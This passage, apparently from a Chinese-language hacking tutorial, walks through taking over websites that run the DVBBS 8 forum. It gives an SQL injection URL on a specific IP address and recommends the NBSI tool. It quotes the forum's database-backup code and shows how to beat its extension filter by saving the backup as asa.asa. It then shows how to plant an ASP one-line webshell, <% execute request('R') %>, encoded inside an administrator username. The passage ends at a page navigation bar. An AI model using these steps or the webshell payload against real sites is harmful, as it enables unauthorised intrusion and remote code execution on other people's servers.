3.1 构造注入点：
http://125.116.85.103/UserPay.asp?raction=alipay_return&out_trade_no=2008011013085936767b64cea5f，建议用nbsi注入 检测--再检测，使用特征字符：非法的订单参数。前台用户表名可增加Dv_User，图4：

（图4）

4 、ACCESS的拿站过程：
方法一：无上传直接备份拿站
首先我们来看看数据库操作文件data.asp,此文件在选择备份的过程中Case "BackupData" 调用updata()过程：

以下是代码片段： 　　sub updata() 　　'On error resume next 　　Dim FileConnStr,Fileconn 　　Dim Tempbackpath 　　Dbpath="../"&db 　　'Dbpath=Replace(request.Form("Dbpath"),chr(0),"") 　　Dbpath=Server.mappath(Dbpath) 　　bkfolder=Replace(request.Form("bkfolder"),chr(0),"") 　　bkdbname=Replace(request.Form("bkdbname"),chr(0),"") 　　Tempbackpath = bkfolder& "/"& bkdbname  　　Rem Add By Dv.唧唧.Net 2007-10-15 　　If InStr(Lcase(Tempbackpath),".asp")>0 Or InStr(Lcase(Tempbackpath),".aspx")>0 Or InStr(Lcase(Tempbackpath),".php")>0 Then 　　response.write "保存数据库名不合法,必须是有效的MDB文件和文件夹目录!" 　　Response.End 　　Exit Sub 　　End If

　　从这个过程分析来看Dbpath="../"&db不可提交的变量，在conn.asp中的Db = "data/dvbbs8.mdb"，也就是我们外部提交已上传文件的位置的Dbpath根本没有被data.asp接受。
　　备份过程中Tempbackpath变量不能出现asp、php、aspx。没办法我们就备份成asa.asa，asa.asa在2003系统目录解释漏洞中的成功比率相当高.
　　在这里还有一个问题没解决，就是dvbbs8.mdb数据库中有<%loop<%防插入字段,我简单来讲一下loop的封闭，具体原理可参考华夏VIP教学的一句话全套系列中的第二课第一节，这里仅讲一下利用过程：
　　第一步：在Dv_Admin表名，即在新增的管理员用户名中，插入“┼攠數畣整爠煥敵瑳∨≒┩眾┼砧”用户名，当然你需要事前要注册一个前台用户,用来被指定为管理员  插入的值为<% execute request("R")%>w<%'x”unicode压缩后的代码，如图5：

（图5）

上一页  [1] [2] [3] [4] [5] [6] [7] [8] 下一页